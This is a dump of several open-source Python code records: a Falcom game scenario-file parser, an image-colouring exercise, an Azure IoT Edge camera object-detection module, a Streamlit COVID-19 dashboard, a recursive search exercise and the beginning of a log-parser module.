name)))\n\n return body\n\n def deserialize(self, fs: fileio.FileStream):\n if not self.DESCRIPTOR:\n return\n\n reader = {\n 'B' : lambda: fs.ReadByte(),\n 'C' : lambda: fs.ReadByte(),\n 'H' : lambda: fs.ReadUShort(),\n 'W' : lambda: fs.ReadUShort(),\n 'i' : lambda: fs.ReadLong(),\n 'I' : lambda: fs.ReadULong(),\n 'L' : lambda: fs.ReadULong(),\n 'f' : lambda: fs.ReadFloat(),\n 'S' : lambda: fs.ReadMultiByte(),\n 'r' : lambda: None,\n }\n\n for name, type in self.DESCRIPTOR:\n setattr(self, name, reader[type]())\n\n def __str__(self):\n return '\\n'.join(self.toPython())\n\n __repr__ = __str__\n\nclass DATFileIndex:\n INVALID_INDEX = 0xFFFFFFFF\n\n def __init__(self, value: int = INVALID_INDEX, *, fs: fileio.FileStream = None) -> None:\n if isinstance(value, str):\n value = GlobalConfig.DirTable[value]\n\n self.value = value # type: int\n self.read(fs)\n\n @property\n def dat(self) -> int:\n return self.value >> 16\n\n @property\n def index(self) -> int:\n return self.value & 0xFFFF\n\n def read(self, fs: fileio.FileStream):\n if not fs:\n return\n\n self.value = fs.ReadULong()\n\n 
def serialize(self) -> bytes:\n buf = bytearray()\n buf.extend(utils.int_to_bytes(self.value, 4))\n return bytes(buf)\n\n @property\n def datName(self) -> str:\n return f'ED6_DT{self.dat:02d}'\n\n @property\n def fileName(self) -> str | None:\n if GlobalConfig.DirTable:\n name = GlobalConfig.DirTable.get(f'{self.value:08X}')\n if name is None:\n return None\n\n return f\"'{name}'\"\n\n return None\n\n @property\n def nameOrValue(self) -> str:\n name = self.fileName\n if name is not None:\n return name\n\n return \"0x%08X\" % self.value\n\n def __str__(self) -> str:\n return f'({self.datName}, 0x{self.index:X})' if self.value != self.INVALID_INDEX else ''\n\n __repr__ = __str__\n\nclass ScenaDataIndex:\n def __init__(self, offset: int = 0, size: int = 0, *, fs: fileio.FileStream = None):\n self.offset = offset # type: int\n self.size = size # type: int\n\n self.read(fs)\n\n def read(self, fs: fileio.FileStream):\n if not fs:\n return\n\n self.offset = fs.ReadUShort()\n self.size = fs.ReadUShort()\n\n def serialize(self) -> bytes:\n buf = bytearray()\n buf.extend(utils.int_to_bytes((self.size << 16) | self.offset, 4))\n return bytes(buf)\n\n def __str__(self) -> str:\n return f'(0x{self.offset:X}, 0x{self.size:X})'\n\n __repr__ = __str__\n\nclass ScenaEntryPoint(ScenaTypeBase):\n SIZE = 0x44\n DESCRIPTOR = (\n ('dword_00', 'L'),\n ('dword_04', 'L'),\n ('dword_08', 'L'),\n ('word_0C', 'W'),\n ('word_0E', 'W'),\n ('dword_10', 'i'),\n ('dword_14', 'i'),\n ('dword_18', 'i'),\n ('dword_1C', 'i'),\n ('dword_20', 'i'),\n ('dword_24', 'i'),\n ('dword_28', 'i'),\n ('dword_2C', 'i'),\n ('word_30', 'H'),\n ('word_32', 'H'),\n ('word_34', 'H'),\n ('word_36', 'H'),\n ('word_38', 'H'),\n ('word_3A', 'H'),\n ('preInitScena', 'W'),\n ('preInitFunction', 'W'),\n ('initScena', 'W'),\n ('initFunction', 'W'),\n )\n\nclass ScenaHeader:\n IMPORT_SCENA_COUNT = 8\n DATA_TABLE_COUNT = 6\n\n def __init__(self, *, fs: fileio.FileStream = None):\n self.mapName = '' # type: str\n self.mapModel = '' # type: str\n self.bgm = 0 # type: int\n self.flags = 0 # type: int\n self.entryFunction = 0 # type: int\n self.importTable = [DATFileIndex()] * self.IMPORT_SCENA_COUNT # type: List[DATFileIndex]\n self.reserved = 0 # type: int\n self.dataTable = [ScenaDataIndex()] * self.DATA_TABLE_COUNT # type: List[ScenaDataIndex]\n self.stringTableOffset = 0 # type: int\n self.headerSize = 0 # type: int\n self.functionTable = ScenaDataIndex() # type: ScenaDataIndex\n self.entryPoint = [] # type: List[ScenaEntryPoint]\n self.entryPointOffset = 0 # type: int\n\n self.read(fs)\n\n def read(self, fs: fileio.FileStream):\n if not fs:\n return\n\n self.mapName = utils.read_fixed_string(fs, 0x0A) # 0x00\n self.mapModel = utils.read_fixed_string(fs, 0x0E) # 0x0A\n self.mapIndex = fs.ReadUShort() # 0x18\n self.bgm = fs.ReadUShort() # 0x1A\n self.flags = fs.ReadUShort() # 0x1C\n self.entryFunction = fs.ReadUShort() # 0x1E\n self.importTable = [DATFileIndex(fs = fs) for _ in range(self.IMPORT_SCENA_COUNT)] # 0x20\n self.reserved = fs.ReadUShort() # 0x40\n self.dataTable = [ScenaDataIndex(fs = fs) for _ in range(self.DATA_TABLE_COUNT)] # 0x42\n self.stringTableOffset = fs.ReadUShort() # 0x5A\n self.headerSize = fs.ReadULong() # 0x5C\n self.functionTable = ScenaDataIndex(fs = fs) # 0x60\n self.entryPointOffset = fs.Position\n\n entryPointCount = (self.dataTable[0].offset - self.entryPointOffset) // ScenaEntryPoint.SIZE\n for _ in range(entryPointCount):\n self.entryPoint.append(ScenaEntryPoint(fs = fs))\n\n def serialize(self) -> bytes:\n assert 
len(self.importTable) == self.IMPORT_SCENA_COUNT\n assert len(self.dataTable) == self.DATA_TABLE_COUNT\n\n buf = bytearray()\n\n buf.extend(utils.pad_string(self.mapName, 0x0A))\n buf.extend(utils.pad_string(self.mapModel, 0x0E))\n buf.extend(utils.int_to_bytes(self.mapIndex, 2))\n buf.extend(utils.int_to_bytes(self.bgm, 2))\n buf.extend(utils.int_to_bytes(self.flags, 2))\n buf.extend(utils.int_to_bytes(self.entryFunction, 2))\n\n for idx in self.importTable:\n buf.extend(idx.serialize())\n\n buf.extend(utils.int_to_bytes(self.reserved, 2))\n\n for idx in self.dataTable:\n buf.extend(idx.serialize())\n\n buf.extend(utils.int_to_bytes(self.stringTableOffset, 2))\n buf.extend(utils.int_to_bytes(self.headerSize, 4))\n buf.extend(self.functionTable.serialize())\n\n for e in self.entryPoint:\n buf.extend(e.serialize())\n\n return bytes(buf)\n\nclass ScenaChipData(DATFileIndex):\n pass\n\nclass ScenaNpcData(ScenaTypeBase):\n DESCRIPTOR = (\n ('name', 'r'),\n ('x', 'i'),\n ('z', 'i'),\n ('y', 'i'),\n ('direction', 'H'),\n ('word_0E', 'H'),\n ('dword_10', 'I'),\n ('chipIndex', 'H'),\n ('npcIndex', 'W'),\n ('initFunctionIndex', 'W'),\n ('initScenaIndex', 'W'),\n ('talkFunctionIndex', 'W'),\n ('talkScenaIndex', 'W'),\n )\n\nclass ScenaMonsterData(ScenaTypeBase):\n DESCRIPTOR = (\n ('name', 'r'),\n ('x', 'i'),\n ('z', 'i'),\n ('y', 'i'),\n ('word_0C', 'W'),\n ('word_0E', 'W'),\n ('byte_10', 'B'),\n ('byte_11', 'B'),\n ('dword_12', 'L'),\n ('battleIndex', 'W'),\n ('word_18', 'W'),\n ('word_1A', 'W'),\n )\n\nclass ScenaEventData(ScenaTypeBase):\n DESCRIPTOR = (\n ('x', 'i'),\n ('y', 'i'),\n ('z', 'i'),\n ('range', 'i'),\n ('dword_10', 'L'),\n ('dword_14', 'L'),\n ('dword_18', 'L'),\n ('dword_1C', 'L'),\n )\n\nclass ScenaActorData(ScenaTypeBase):\n DESCRIPTOR = (\n ('triggerX', 'i'),\n ('triggerZ', 'i'),\n ('triggerY', 'i'),\n ('triggerRange', 'i'),\n ('actorX', 'i'),\n ('actorZ', 'i'),\n ('actorY', 'i'),\n ('flags', 'W'),\n ('talkScenaIndex', 'W'),\n ('talkFunctionIndex', 'W'),\n ('word_22', 'W'),\n )\n\nclass ScenaFunctionType(IntEnum2):\n Invalid = 0\n Code = 1\n ChipData = 2\n NpcData = 3\n MonsterData = 4\n EventData = 5\n ActorData = 6\n StringTable = 7\n Header = 8\n EntryPoint = 9\n\nclass ScenaDataTableType(IntEnum2):\n ChipDataCH = 0\n ChipDataCP = 1\n NpcData = 2\n MonsterData = 3\n EventData = 4\n ActorData = 5\n\nScenaDataFunctionTypes = set([\n ScenaFunctionType.Header,\n ScenaFunctionType.StringTable,\n ScenaFunctionType.EntryPoint,\n ScenaFunctionType.ChipData,\n ScenaFunctionType.NpcData,\n ScenaFunctionType.MonsterData,\n ScenaFunctionType.EventData,\n ScenaFunctionType.ActorData,\n])\n\nclass ScenaFunction:\n def __init__(self, index: int, offset: int, name: str, *, type = ScenaFunctionType.Invalid, obj = None):\n self.index = index\n self.offset = offset\n self.name = name\n self.type = type\n self.obj = obj\n\n def __str__(self) -> str:\n return f'{self.name}(index = 0x{self.index:04X}, offset = 0x{self.offset:08X}, type = {self.type})'\n\n __repr__ = __str__\n","repo_name":"Ouroboros/Falcom","sub_path":"Decompiler2/Falcom/ED6/Parser/scena_types.py","file_name":"scena_types.py","file_ext":"py","file_size_in_byte":13129,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"61"} +{"seq_id":"22907161898","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#Setting Initialization\n# penyimpanan file\nfilePath = \"/Users/aditya/git/aditya1-github/VisKomp/images/NPID/\" # direktori file\nfileExt = \".jpg\" # ekstension file\nfileName = 
filePath + \"Background_604x914\" + fileExt # nama file beserta ekstensinya\n\n# ukuran canvas\nrow = int(604) # jumlah baris pixel\ncol = int(914) # jumlah kolom pixel\nchannel = int(3) #\njump_row = 4 # jumlah baris akan diwarnai saat satu kali proses pewarnaan\nbackground = np.zeros(shape=(row, col, channel), dtype=np.uint8) # membuat latar canva pixel\nprint('initialization : \\n row, col =', row, ',', col) # cetak u/ log\n\n# mewarnai\n# background[int(row/2):int(row), :, :] = 0 # background black R=0 G=0 B=0\n# background[int(row/2):int(row), :, 1] = 255 # background green R=0 G=255 B=0\n\n#proses mewarnai terhadap setiap pixel\nfor i in range(1, row - jump_row): # loop sebanyak jml row - jump_row\n for j in range(1, col): # loop sebanyak jml column\n #background[i + jump_row, j, 0] = background[i, j, 0] + 1 # mewarnai dengan RGB setiap pixel\n background[i + jump_row, j, 1] = background[i, j, 1] + 1 # mewarnai dengan RGB setiap pixel\n print('row, col =', i, ',', j) # cetak u/ log\n\n# mensimpan hasil warna pada pixel menjadi image\nplt.imsave(fileName, background)\n\n#proses memanggil\nplt.figure(1) # membuat jendela untuk canva\nplt.imshow(background) # menampilkan background ke jendela canva\nplt.show() # menampilkan jendela canva","repo_name":"aditya1-github/IFA515-UTS-Computer-Vision","sub_path":"002. Project/VisKomp/PraktikumEdgeDetection002.py","file_name":"PraktikumEdgeDetection002.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35619639218","text":"import os\nimport sys\nimport time\n\nimport cv2\nfrom tflite_support.task import core\nfrom tflite_support.task import processor\nfrom tflite_support.task import vision\n\nfrom azure.iot.device import IoTHubModuleClient, Message\n\nimport CameraCapture\nfrom CameraCapture import CameraCapture\nimport VideoStream\nfrom VideoStream import VideoStream\n\n\n# global counters\nSEND_CALLBACKS = 0\n\ndef send_to_Hub_callback(strMessage):\n message = Message(bytearray(strMessage, 'utf8'))\n hubManager.send_message_to_output(message, \"output1\")\n\n# Callback received when the message that we're forwarding is processed.\n\nclass HubManager(object):\n\n def __init__(\n self,\n messageTimeout,\n verbose):\n '''\n Communicate with the Edge Hub\n\n :param int messageTimeout: the maximum time in milliseconds until a message times out. The timeout period starts at IoTHubClient.send_event_async. By default, messages do not expire.\n :param IoTHubTransportProvider protocol: Choose HTTP, AMQP or MQTT as transport protocol. 
Currently only MQTT is supported.\n :param bool verbose: set to true to get detailed logs on messages\n '''\n self.messageTimeout = messageTimeout\n self.client = IoTHubModuleClient.create_from_edge_environment()\n #self.client.set_option(\"messageTimeout\", self.messageTimeout)\n #self.client.set_option(\"product_info\", \"edge-camera-capture\")\n #if verbose:\n # self.client.set_option(\"logtrace\", 1) # enables MQTT logging\n\n def send_message_to_output(self, event, outputQueueName):\n self.client.send_message_to_output(event, outputQueueName)\n global SEND_CALLBACKS\n SEND_CALLBACKS += 1\n\ndef __IsInt(string):\n try: \n int(string)\n return True\n except ValueError:\n return False\n\n\ndef IsInResult(tag, result):\n if len(result) == 0:\n return False\n for i in result:\n if (tag == i[0]):\n return True\n return False\n\ndef telemeter(i, on):\n telemeter_text = '{ \"tagName\": \"' + i[0] + '\", \"probability\": '\n if on:\n telemeter_text = telemeter_text + str(i[1]) + ', \"state\": true }'\n else:\n telemeter_text = telemeter_text + str(0.00) + ', \"state\": false }'\n print(telemeter_text)\n\n send_to_Hub_callback(telemeter_text)\n\ndef runDetect(model: str, maxObjects: int, scoreThresholdPct: int, videoPath: str, width: int, height: int, num_threads: int,\n enable_edgetpu: bool, showVideo: bool, bypassIot: bool) -> None:\n \"\"\"Continuously run inference on images acquired from the camera.\n\n Args:\n model: Name of the TFLite object detection model.\n videoPath: The camera id/path to be passed to OpenCV.\n width: The width of the frame captured from the camera.\n height: The height of the frame captured from the camera.\n num_threads: The number of CPU threads to run the model.\n enable_edgetpu: True/False whether the model is a EdgeTPU model.\n \"\"\"\n\n # Variables to calculate FPS\n counter, fps = 0, 0\n start_time = time.time()\n vs = None\n isWebcam = False\n\n if (__IsInt(videoPath)):\n isWebcam = True\n vs = VideoStream(int(videoPath), width, height).start()\n time.sleep(1.0)#needed to load at least one frame into the VideoStream class\n else:\n cap = cv2.VideoCapture(videoPath)\n # Start capturing video input from the camera\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n\n # Visualization parameters\n fps_avg_frame_count = 10\n\n # Initialize the object detection model\n base_options = core.BaseOptions(\n file_name=model, use_coral=enable_edgetpu, num_threads=num_threads)\n detection_options = processor.DetectionOptions(\n max_results=maxObjects, score_threshold=scoreThresholdPct/100.0)\n options = vision.ObjectDetectorOptions(\n base_options=base_options, detection_options=detection_options)\n detector = vision.ObjectDetector.create_from_options(options)\n\n previousResults = []\n\n # Continuously capture images from the camera and run inference\n while True:\n image = None\n if isWebcam:\n image = vs.read()\n else:\n image = cap.read()[1]\n if (image is None):\n if (not isWebcam):\n cap.set(cv2.CAP_PROP_POS_FRAMES, 0)\n counter = 0\n continue\n sys.exit(\n 'ERROR: Unable to read from webcam. 
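`telemeter` above builds its JSON payload by string concatenation, which breaks as soon as a tag name contains a quote. A sketch of the same payload built with `json.dumps` (field names mirror those in `telemeter`; the helper name is illustrative):

```python
import json

def build_telemetry(tag_name: str, probability: float, on: bool) -> str:
    payload = {
        "tagName": tag_name,
        "probability": round(probability, 2) if on else 0.0,
        "state": on,
    }
    return json.dumps(payload)

# e.g. '{"tagName": "apple", "probability": 0.87, "state": true}'
print(build_telemetry("apple", 0.87, True))
```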
Please verify your webcam settings.'\n )\n \n counter += 1\n image = cv2.flip(image, 1)\n\n # Convert the image from BGR to RGB as required by the TFLite model.\n rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # Create a TensorImage object from the RGB image.\n input_tensor = vision.TensorImage.create_from_array(rgb_image)\n\n \n # Run object detection estimation using the model.\n detection_result = detector.detect(input_tensor)\n\n results = []\n\n for detection in detection_result.detections:\n category = detection.classes[0]\n class_name = category.class_name\n probability = round(category.score, 2)\n result_text = class_name + ' (' + str(probability) + ')'\n results.append((class_name,probability))\n results.sort()\n# print(result_text)\n\n for i in results:\n if (not IsInResult(i[0], previousResults)):\n print('turn it on ' + i[0])\n if not bypassIot:\n telemeter(i, True)\n\n\n for i in previousResults:\n if (not IsInResult(i[0], results)):\n print('turn it off ' + i[0])\n if not bypassIot:\n telemeter(i, False)\n\n previousResults = results\n \n cameraCapture.put_display_frame(image, detection_result)\n\n # Calculate the FPS\n if counter % fps_avg_frame_count == 0:\n end_time = time.time()\n fps = fps_avg_frame_count / (end_time - start_time)\n start_time = time.time()\n\n # Show the FPS\n fps_text = 'FPS = {:.1f}'.format(fps)\n# print(fps_text)\n# print(counter)\n\ndef main(\n debugy = False,\n model = \"\",\n maxObjects=3,\n scoreThresholdPct=30,\n videoPath=\"0\",\n frameWidth = 0,\n frameHeight = 0,\n numThreads = 0,\n enableEdgeTPU = False,\n showVideo = False,\n verbose = False,\n bypassIot = False\n):\n #if debugy:\n # print(\"Wait for debugger!!!\")\n # import debugpy\n # debugpy.listen(5678)\n # debugpy.wait_for_client() # blocks execution until client is attached\n try:\n print(\"\nPython %s\n\" % sys.version)\n print(\"Camera Capture Azure IoT Edge Module. Press Ctrl-C to exit.\")\n print(\"Initialising the camera capture with the following parameters: \")\n print(\" - Model file: \" + model)\n print(\" - Max results: \" + str(maxObjects))\n print(\" - Score threshold percent: \" + str(scoreThresholdPct))\n print(\" - Video path: \" + videoPath)\n print(\" - Frame width: \" + str(frameWidth))\n print(\" - Frame height: \" + str(frameHeight))\n print(\" - Num Threads: \" + str(numThreads))\n print(\" - Enable TPU: \" + str(enableEdgeTPU))\n print(\" - Show video: \" + str(showVideo))\n print(\" - Verbose: \" + str(verbose))\n print(\" - Send processing results to hub: \" + str(not bypassIot))\n print()\n try:\n if not bypassIot:\n global hubManager\n hubManager = HubManager(\n 100, verbose)\n except Exception as iothub_error:\n print(\"Unexpected error %s from IoTHub\" % iothub_error)\n return\n global cameraCapture\n with CameraCapture(showVideo) as cameraCapture:\n cameraCapture\n\n runDetect(model,maxObjects,scoreThresholdPct,videoPath,frameWidth, frameHeight, numThreads,enableEdgeTPU, showVideo, bypassIot)\n\n except KeyboardInterrupt:\n print(\"Camera capture module stopped\")\n\ndef __convertStringToBool(env):\n if env in ['True', 'TRUE', '1', 'y', 'YES', 'Y', 'Yes']:\n return True\n elif env in ['False', 'FALSE', '0', 'n', 'NO', 'N', 'No']:\n return False\n else:\n raise ValueError('Could not convert string to bool.')\n\n'''\nCapture a camera feed, send it to processing and forward outputs to EdgeHub\n\n:param str MODEL: model file. 
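The two loops near the end of `runDetect` diff the current results against `previousResults` to decide which tags to "turn on" or "turn off". Since items are `(class_name, probability)` tuples and matching is by name only, set difference expresses the same logic; a sketch (helper name illustrative):

```python
def transitions(previous, current):
    """Return (appeared, disappeared) class-name sets between two detection passes."""
    prev_names = {name for name, _ in previous}
    curr_names = {name for name, _ in current}
    return curr_names - prev_names, prev_names - curr_names

appeared, disappeared = transitions([("apple", 0.9)], [("banana", 0.7)])
assert appeared == {"banana"} and disappeared == {"apple"}
```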
Example: \"efficientdet_lite0.tflite\".\n:param str VIDEO_PATH: camera device path such as /dev/video0 or a test video file such as /Test/myvideo.avi. /dev/video0 by default (\"0\")\n:param etc..\n'''\n\nif __name__ == '__main__':\n try:\n DEBUGY = __convertStringToBool(os.getenv('DEBUG', 'False'))\n MODEL = os.getenv('MODEL', \"efficientdet_lite0.tflite\")\n MAX_OBJECTS = int(os.getenv('MAX_OBJECTS', 3))\n THRESHOLD_PCT = int(os.getenv('THRESHOLD_PCT', 30))\n VIDEO_PATH = os.getenv('VIDEO_PATH', \"../test/AppleAndBanana.mp4\")\n FRAME_WIDTH = int(os.getenv('FRAME_WIDTH', 640))\n FRAME_HEIGHT = int(os.getenv('FRAME_HEIGHT', 480))\n NUM_THREADS = int(os.getenv('NUM_THREADS', 4))\n ENABLE_TPU = __convertStringToBool(os.getenv('ENABLE_TPU', 'False'))\n SHOW_VIDEO = __convertStringToBool(os.getenv('SHOW_VIDEO', 'True'))\n VERBOSE = __convertStringToBool(os.getenv('VERBOSE', 'False'))\n BYPASS_IOT = __convertStringToBool(os.getenv('BYPASS_IOT', 'True'))\n\n except ValueError as error:\n print(error)\n sys.exit(1)\n\nmain(DEBUGY, MODEL, MAX_OBJECTS, THRESHOLD_PCT, VIDEO_PATH, FRAME_WIDTH, FRAME_HEIGHT, NUM_THREADS, ENABLE_TPU,\n SHOW_VIDEO, VERBOSE, BYPASS_IOT)\n","repo_name":"dvescovi1/VisionRPI","sub_path":"modules/CameraCapture/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6120550457","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport time\nimport pandas as pd\nimport streamlit as st\nimport datetime\n\nsource = \"https://covid.ourworldindata.org/data/ecdc/\"\ndataset_array = [\"new_cases\", \"new_deaths\", \"total_cases\", \"total_deaths\"]\nmode = st.sidebar.radio(\"Select view\", [\"One country curve\", \"Countries comparison\", \"Summary\", \"Readme\"])\n\nst.title('Covid-19-visualizer')\n\n# @st.cache\ndef read_csv(array, fetch):\n\tdataframes_dict = {}\n\tfor dataset in dataset_array:\n\t\tif fetch:\n\t\t\twith st.spinner(\"Fetching \"+dataset+\"...\"):\n\t\t\t\ttry:\n\t\t\t\t\tdataframes_dict[dataset] = pd.read_csv(source + dataset+\".csv\")\n\t\t\t\t\tdataframes_dict[dataset].to_csv(dataset+\".csv\")\n\t\t\t\t\tst.success(\"Success downloading \"+ dataset+\".csv\")\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tst.error(e)\n\t\t\t\t\treturn read_csv(array, False) # try read from disk\n\t\telse:\n\t\t\tif os.path.exists(dataset+\".csv\"):\n\t\t\t\tdataframes_dict[dataset] = pd.read_csv(dataset+\".csv\")\n\t\t\telse:\n\t\t\t\treturn {}, False\n\treturn dataframes_dict, True\n\ndataframes_dict, have_data = read_csv(dataset_array, False)\n\nif not have_data:\n\tst.error(\"There is no data and no connection\")\n\tfetch = st.button(\"Click here to retry.\")\n\tif fetch:\n\t\tdataframes_dict = read_csv(dataset_array, fetch)\nelse:\n\ttop10 = st.sidebar.checkbox(\"Top-10\", True)\n\t# i = st.sidebar.slider(\"filter >=\", 0, 10000, 100, step=100) if not top10 else 0 # slider doesn't work, don't kwnow Y?\n\ti = st.sidebar.number_input('Filter >=', min_value=0, max_value=10000, value=300, step=100) if not top10 else 0\n\n\tdf_filtered_dict = {}\n\ttop10_countries = {}\n\n\tfor dataset_key in dataframes_dict:\n\t\tcountries = []\n\t\tlast_pos = len(dataframes_dict[dataset_key]) -1\n\t\t\n\t\tfor country in dataframes_dict[dataset_key].columns[1:]:\n\t\t\tif country==\"date\" or str(dataframes_dict[dataset_key].loc[last_pos,country]) == \"nan\":\n\t\t\t\tcontinue\n\t\t\tif 
int(dataframes_dict[dataset_key].loc[last_pos,country]) >= i:\n\t\t\t\tcountries.append((country, int(dataframes_dict[dataset_key].loc[last_pos,country])))\n\t\tcountries = sorted(countries, key=lambda tup: - tup[1])\n\t\tif top10:\n\t\t\tcountries = countries[:11]\n\t\t\n\t\tdf_filtered = pd.DataFrame(columns=[a for a,b in countries])\n\t\tdf_filtered.loc[dataset_key] = [b for a,b in countries]\n\t\tdf_filtered_dict[dataset_key] = df_filtered\n\t\tfor a,b in countries:\n\t\t\ttop10_countries[a] = a\n\n\tst.write(\"Date: \",dataframes_dict[dataset_key].loc[last_pos, \"date\"])\n\n\tif dataframes_dict[dataset_key].loc[last_pos, \"date\"] < str(datetime.date.today()) and mode != \"Readme\":\n\t\tif st.button(\"Data is old. Click here to fetch data.\"):\n\t\t\tdataframes_dict, have_data = read_csv(dataset_array, True)\n\t\t\tlast_pos = len(dataframes_dict[dataset_key]) -1\n\t\t\t\n\n\tf = plt.figure()\n\n\tif mode == \"One country curve\":\n\t\tcountry = st.sidebar.selectbox(\"Country\", list(top10_countries))\n\t\tall_dataset = st.sidebar.checkbox(\"All in One\", True)\n\t\tif all_dataset:\n\t\t\tgrid_size = (7,7)\n\t\t\tpos = [(0, 0),(0, 4),(4, 0),(4, 4)]\n\t\t\tfor i in range(4):\n\t\t\t\tplt.subplot2grid(grid_size, pos[i], rowspan=3, colspan=3)\n\t\t\t\tplt.bar(range(last_pos+1), dataframes_dict[dataset_array[i]][country])\n\t\t\t\tplt.title(dataset_array[i])\n\t\t\tst.plotly_chart(f)\n\t\t\t# st.pyplot()\n\t\t\tp = pd.DataFrame(columns=dataframes_dict.keys())\n\t\t\tfor dataset_key in dataframes_dict:\n\t\t\t\tp.loc[country, dataset_key] = dataframes_dict[dataset_key].loc[last_pos,country]\n\t\t\tst.write(p)\n\t\t\t# death_percent = total_deaths * 100 /total_cases\n\t\telse:\n\t\t\tselected_dataset = st.sidebar.radio(\"Dataset\",options=dataset_array)\n\t\t\tplt.bar(range(last_pos+1), dataframes_dict[selected_dataset][country])\n\t\t\tst.plotly_chart(f)\n\t\t\t# st.pyplot()\n\t\t\tst.write(country,\"|\", selected_dataset, dataframes_dict[selected_dataset].loc[last_pos,country])\n\n\tif mode == \"Countries comparison\":\n\t\tcountries = countries[1:]\n\t\tselected_dataset = st.sidebar.radio(\"Dataset\", options=dataset_array)\n\t\tdf_filtered_dict[selected_dataset].drop(['World'], axis='columns', inplace=True)\n\t\tplt.bar(range(len(df_filtered_dict[selected_dataset].columns)), df_filtered_dict[selected_dataset].loc[selected_dataset])\n\t\tplt.xticks(range(len(df_filtered_dict[selected_dataset].columns)), df_filtered_dict[selected_dataset].columns)\n\t\tlabels = plt.axes().get_xticklabels()\n\t\tplt.setp(labels, rotation = 30.) 
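The top-10 selection above walks the last row of each frame column by column. If the last row holds the latest totals, pandas can do the ranking directly; a hedged sketch (assumes numeric country columns, dropping the 'date' column first; the helper name is illustrative):

```python
import pandas as pd

def top_countries(df: pd.DataFrame, n: int = 10) -> pd.Series:
    latest = df.drop(columns=["date"], errors="ignore").iloc[-1].dropna()
    return latest.nlargest(n)  # index = country names, values = latest counts
```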
# this doesn't work with plotly\n\t\tst.plotly_chart(f)\n\t\t# st.pyplot()\n\t\tst.write(df_filtered_dict[selected_dataset])\n\t\tst.write(\"World \", dataframes_dict[selected_dataset].loc[last_pos,\"World\"])\n\n\tif mode == \"Summary\":\n\t\tfor dataset_key in dataframes_dict:\n\t\t\tst.write(df_filtered_dict[dataset_key])\n\n\tif mode == \"Readme\":\n\t\twith open(\"Readme.md\") as readme_file:\n\t\t\treadme_text = readme_file.read()\n\t\t\tst.markdown(readme_text[21:])\n","repo_name":"flakula/covid-19-visualizer","sub_path":"covid-19.py","file_name":"covid-19.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73276809473","text":"def search(nums, k, tmp):\n\tif tmp == len(nums): # past the end: k not found (len(nums) - 1 here skipped the last element)\n\t\treturn -1\n\tif nums[tmp] == k:\n\t\treturn tmp\n\telse:\n\t\ttmp += 1\n\t\treturn search(nums, k, tmp)\n\n\ndef solution(nums):\n\tnums, k = nums.split(\"],\")\n\tnums = list(map(int, nums[1:].split(\",\")))\n\tk = int(k)\n\tres = search(nums, k, 0)\n\tprint(f\"Output: {res}\")\n\n\nnums = input(\"Input: \")\nsolution(nums)\n","repo_name":"lisy0123/Study","sub_path":"01_Mail_programming/d25/d25.py","file_name":"d25.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39226870100","text":"import time\nimport datetime\nimport re\nimport json\nimport dicttools\nimport platform\nimport socket\nimport copy\nimport sys\nimport pprint\nfrom operator import itemgetter\nfrom subprocess import Popen, PIPE # for cURL data sending\nimport smtplib # for the actual sending function\nfrom email.mime.text import MIMEText # email module\n\n__author__ = 'Ralf'\n\n# !/usr/bin/env python3\n\n# constants\nLOG_INTEND = 4\nLOG_MAX_TEXT_LEN = 80\nKEY_KEYS = 'keys'\nCONFIG_FILE = './config/logparser.yml'\nCONN_FILE = './config/connections.yml'\nVAR_DELIMITER = '%'\n# placeholders\nPH_DATE = '%dt%'\nPH_DATE_NOW = '%dtNow%'\nPH_BUSINESS_AREA = '%businessArea%'\nPH_CHUNK_KEY = '%chunkKey%'\nPH_CONFIGFILE = '%configFile%'\nPH_CUSTOMER_ID = '%customerId%'\nPH_EVENT_STATUS = '%eventStatus%'\nPH_EVENT_DATE = '%eventDate%'\nPH_EVENT_MESSAGE = '%eventMessage%'\nPH_ENVIRONMENT = '%environment%'\nPH_PARSER_ID = '%parserId%'\nPH_PARSER_REGEX = '%parserRegex%'\nPH_SOURCEFILE = '%sourceFile%'\nPH_SOURCE_LINE_NUM = '%sourceLineNum%'\nPH_SOURCE_HOST = '%sourceHost%'\nPH_SOURCE_HOST_SHORT = '%sourceHostShort%'\nPH_SOURCE_SYSTEM = '%sourceSystem%'\nPH_PYTHON_COMPILER = '%pythonCompiler%'\nPH_PYTHON_VERSION = '%pythonVersion%'\nPH_PYTHON_IMPLEMENTATION = '%pythonImplementation%'\nPH_PYTHON_SCRIPT = '%pythonScript%'\n\n\nclass ClsChunk:\n \"\"\" This class is a container for chunk information\n in form of properties.\n\n It is initialized by a chunk of a file and creates\n properties of it.\n \"\"\"\n\n def __init__(self, chunk):\n self.__chunk = chunk\n if self.__chunk:\n assert isinstance(self.__chunk, list)\n\n @property\n def list(self):\n if self.__chunk:\n return self.__chunk\n else:\n return None\n\n @property\n def length(self):\n if self.__chunk:\n return [('size', len(self.__chunk))]\n else:\n return None\n\n @property\n def line_start(self):\n if self.__chunk:\n return [('start', self.__chunk[0]['number'])]\n else:\n return None\n\n @property\n def line_end(self):\n if self.__chunk:\n return [('end', self.__chunk[-1]['number'])]\n else:\n return None\n\n @property\n def log_info(self):\n if self.__chunk:\n return 
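The recursive `search` in d25.py (base case corrected above to `len(nums)`, so the last element is checked too) is a plain left-to-right scan. The standard-library equivalent is `list.index`, which also avoids Python's default ~1000-frame recursion limit on long inputs:

```python
def search_index(nums, k):
    try:
        return nums.index(k)  # first position of k, scanning left to right
    except ValueError:
        return -1

assert search_index([4, 8, 15], 15) == 2
assert search_index([4, 8, 15], 23) == -1
```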
